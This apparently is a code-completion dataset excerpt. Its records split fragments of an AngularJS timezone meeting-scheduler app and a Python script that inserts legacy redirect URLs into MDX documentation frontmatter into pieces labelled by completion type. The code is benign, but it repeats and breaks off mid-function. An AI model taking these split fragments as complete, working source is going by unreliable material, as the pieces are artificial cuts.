if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i | {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
} | identifier_body |
|
app.js | InputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
for (var i = 0; i < zones.length; i++) {
var zoneName = zones[i];
if (zoneName[zoneName.length - 1] == '!') {
zoneName = zoneName.substr(0, zoneName.length - 1);
homeZone = zoneName;
}
allZones.push(zoneName);
}
if (params.date) {
var newDate = moment(params.date, 'YYYY-MM-DD');
if (!moment(newDate).isSame(moment($scope.day))) {
$scope.day = newDate.toDate();
dateChanged = true;
}
}
if (params.range) {
var rangePieces = params.range.split(',');
$scope.timeRange = [parseInt(rangePieces[0], 10),
parseInt(rangePieces[1], 10)];
$scope.scheduleMeeting = true;
} else {
$scope.scheduleMeeting = false;
}
if (dateChanged || $scope.zonesDifferInURL(allZones)) {
$scope.homeZone = null;
$scope.zones = [];
if (homeZone === null && allZones.length > 0)
homeZone = allZones[0];
if (homeZone !== null)
$scope.addZone(homeZone);
for (i = 0; i < allZones.length; i++) {
if (allZones[i] !== homeZone)
$scope.addZone(allZones[i]);
}
$scope.sortByFunc(function(a, b) {
var idx1 = allZones.indexOf(a.urlKey);
var idx2 = allZones.indexOf(b.urlKey);
return idx1 - idx2;
});
$scope.checkForToday();
}
};
$scope.$on('$locationChangeSuccess', $scope.syncWithURL);
window.setTimeout(function() {
$scope.ready = true;
$scope.syncWithURL();
$('div.loading').hide();
$('div.contentwrapper').fadeIn('slow', function() {
window.setInterval(function() {
if ($scope.updateClocks())
$scope.$apply();
}, 1000);
});
}, 100);
});
timesched.directive('timezone', function() {
return {
restrict: 'ACE',
require: 'ngModel',
scope: {
datasets: '=',
ngModel: '='
},
link: function(scope, elm, attrs, ctrl) {
var localChange = false;
elm.typeahead({
name: 'timezone',
local: SELECTABLES,
valueKey: 'd',
engine: {compile: function() {
return {
render: function(context) {
var time;
try {
time = moment.tz(context.z).format('HH:mm');
} catch (e) {
time = '??:??';
}
return '<p>' + context.d + '\u00a0<em>' + time + '</em></p>';
}
};
}},
template: 'dummy'
});
function updateScope() {
var oldVal = elm.val();
scope.$apply(function() {
localChange = true;
scope.ngModel = elm.val();
});
elm.val(oldVal);
}
elm.on('typeahead:selected', function() {
ctrl.$setValidity('timezone', true);
updateScope();
elm.trigger('submit');
});
elm.on('typeahead:autocompleted', updateScope);
elm.bind('input', function() {
scope.$apply(function() {
var value = elm.val();
if (zoneExists(value)) {
localChange = true;
ctrl.$setValidity('timezone', true);
scope.ngModel = value;
} else {
ctrl.$setValidity('timezone', false);
}
});
});
scope.$watch('ngModel', function(newVal) {
if (localChange) | {
localChange = false;
return;
} | conditional_block |
|
app.js | (zoneName) {
return zoneName.toLowerCase().replace(/^\s+|\s+$/g, '');
}
function zoneExists(input) {
return !!SELECTABLES_BY_NAME[normalizeZoneName(input)];
}
function lookupTimeZoneState(input) {
var zone = SELECTABLES_BY_NAME[normalizeZoneName(input)];
if (!zone) {
zone = SELECTABLES_BY_KEY[input];
if (!zone)
return null;
}
var m;
try {
m = moment.tz(normalizeZoneName(zone.z));
} catch (e) {
}
return m !== null ? new TimeZoneState(m, zone) : null;
}
timesched.setTimezoneData = function(data) {
SELECTABLES = [];
SELECTABLES_BY_NAME = {};
SELECTABLES_BY_KEY = {};
for (var i = 0; i < data.selectables.length; i++) {
var sel = data.selectables[i];
SELECTABLES.push(sel);
SELECTABLES_BY_NAME[sel.d.toLowerCase()] = sel;
SELECTABLES_BY_KEY[sel.k] = sel;
}
};
function TimeZoneState(m, zone) {
this.tz = m.tz();
this.urlKey = zone.k;
this.offset = 0;
this.timezoneShortName = zone.n;
this.timezoneName = zone.d;
this.update();
}
TimeZoneState.prototype.update = function(day, homeZone) {
var reftz = homeZone ? homeZone.tz : this.tz;
var start = moment.tz(day, reftz).startOf('day');
var ptr = start.clone().tz(this.tz);
var offset = (start.zone() - ptr.zone()) / 60;
this.dayStart = ptr.clone();
this.homeOffset = (offset > 0 ? '+' : '') + offset;
this.timezoneOffsetInfo = ptr.format('[UTC] Z');
this.utcOffset = ptr.zone();
this.timezoneAbbr = ptr.format('z');
this.isHome = homeZone && homeZone.tz === this.tz;
this.timeCells = [];
for (var i = 0; i < 24; i++) {
if (i !== 0)
ptr.add('hours', 1);
this.timeCells.push({
hour: parseInt(ptr.format('H'), 10),
hourFormat: ptr.format('H'),
minute: parseInt(ptr.format('m'), 10),
minuteFormat: ptr.format('mm'),
tooltip: ptr.format('LLLL (z)')
});
}
if (ptr.zone() !== this.utcOffset) {
var endAbbr = ptr.format('z');
var endOffsetInfo = ptr.format('[UTC] Z');
if (endAbbr != this.timezoneAbbr)
this.timezoneAbbr += '/' + endAbbr;
if (endOffsetInfo != this.timezoneOffsetInfo)
this.timezoneOffsetInfo += '/' + endOffsetInfo;
}
this.updateClock();
};
TimeZoneState.prototype.updateClock = function() {
var now = moment.tz(this.tz);
var oldH = this.clockHour;
var oldM = this.clockMinute;
this.clockHour = now.format('H');
this.clockMinute = now.format('mm');
return this.clockHour !== oldH || this.clockMinute !== oldM;
};
timesched.controller('TimezoneCtrl', function($scope, $location, datepickerConfig) {
$scope.day = new Date();
$scope.isToday = true;
$scope.zones = [];
$scope.homeZone = null;
$scope.currentZone = null;
$scope.ready = false;
$scope.timeRange = [40, 68];
$scope.scheduleMeeting = false;
$scope.meetingSummary = '';
// make the datepicker show monday by default
datepickerConfig.startingDay = 1;
$scope.addInputZone = function() {
if ($scope.addZone($scope.currentZone))
$scope.currentZone = '';
};
$scope.addZone = function(zoneName) {
var zoneState = lookupTimeZoneState(zoneName);
if (zoneState === null)
return false;
$scope.zones.push(zoneState);
$scope.updateZones();
return true;
};
$scope.setAsHome = function(zone) {
$scope.homeZone = zone;
$scope.updateZones();
$scope.saveState();
};
$scope.removeZone = function(zone) {
for (var i = 0, n = $scope.zones.length; i < n; i++) {
if ($scope.zones[i] !== zone)
continue;
$scope.zones.splice(i, 1);
if ($scope.homeZone === zone) {
$scope.homeZone = null;
$scope.updateZones();
}
break;
}
};
$scope.sortByOffset = function() {
$scope.sortByFunc(function(a, b) {
return b.utcOffset - a.utcOffset;
});
};
$scope.sortByName = function() {
$scope.sortByFunc(function(a, b) {
a = a.timezoneName.toLowerCase();
b = b.timezoneName.toLowerCase();
return a == b ? 0 : a < b ? -1 : 1;
});
};
$scope.sortByFunc = function(sortFunc) {
var copy = $scope.zones.slice(0);
copy.sort(sortFunc);
$scope.zones = copy;
};
$scope.updateClocks = function() {
var rv = false;
$scope.zones.forEach(function(zone) {
if (zone.updateClock())
rv = true;
});
var wasToday = $scope.isToday;
$scope.checkForToday();
return rv || (wasToday != $scope.isToday);
};
$scope.checkForToday = function() {
if ($scope.homeZone === null)
return;
var now = moment.tz($scope.homeZone.tz).format('YYYY-MM-DD');
var dayStart = moment.tz($scope.day, $scope.homeZone.tz).format('YYYY-MM-DD');
$scope.isToday = now == dayStart;
};
$scope.updateZones = function() {
if (!$scope.zones.length)
return;
if ($scope.homeZone === null)
$scope.homeZone = $scope.zones[0];
$scope.zones.forEach(function(zone) {
zone.update($scope.day, $scope.homeZone);
});
};
$scope.$watch('day', function() {
$scope.updateZones();
$scope.saveState();
});
$scope.$watch('scheduleMeeting', function() {
$scope.saveState();
});
$scope.$watch('timeRange', function() {
$scope.saveState();
});
$scope.$watchCollection('zones', function() {
$scope.saveState();
});
$scope.saveState = function() {
if (!$scope.ready)
return;
var buf = [];
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var item = zone.urlKey;
if (zone.isHome)
item += '!';
buf.push(item);
}
var params = {};
params.date = moment($scope.day).format('YYYY-MM-DD');
if (buf.length > 0)
params.tz = buf.join(',');
if ($scope.scheduleMeeting)
params.range = $scope.timeRange[0] + ',' + $scope.timeRange[1];
if (params.tz != $location.search.tz ||
params.date != $location.search.date ||
params.range != $location.search.range)
$location.search(params);
if ($scope.scheduleMeeting)
$scope.updateMeetingSummary();
};
$scope.updateMeetingSummary = function() {
var lines = [];
var fmt = 'HH:mm ddd, MMM D YYYY';
for (var i = 0; i < $scope.zones.length; i++) {
var zone = $scope.zones[i];
var start = zone.dayStart.clone().add('minutes', $scope.timeRange[0] * 15);
var end = zone.dayStart.clone().add('minutes', $scope.timeRange[1] * 15);
if (i > 0)
lines.push('');
lines.push(zone.timezoneName + ' [' + start.format('z; [UTC]ZZ') +
(start.zone() != end.zone() ? '; timezone change' : '') + ']');
lines.push(start.format(fmt));
lines.push(end.format(fmt));
}
$scope.meetingSummary = lines.join('\n');
};
$scope.zonesDifferInURL = function(urlZones) {
if (urlZones.length != $scope.zones.length)
return true;
for (var i = 0; i < urlZones.length; i++) {
if (urlZones[i] !== $scope.zones[i].urlKey)
return true;
}
return false;
};
$scope.syncWithURL = function() {
var allZones = [];
var homeZone = null;
var params = $location.search();
var zones = (params.tz || '').split(',');
var dateChanged = false;
if (zones.length == 1 && zones[0] === '')
zones = [];
| normalizeZoneName | identifier_name |
|
add_legacy_redirects.py | and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = [] | headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line): | random_line_split |
add_legacy_redirects.py | and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
| determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
| title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def | identifier_body |
add_legacy_redirects.py | (output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
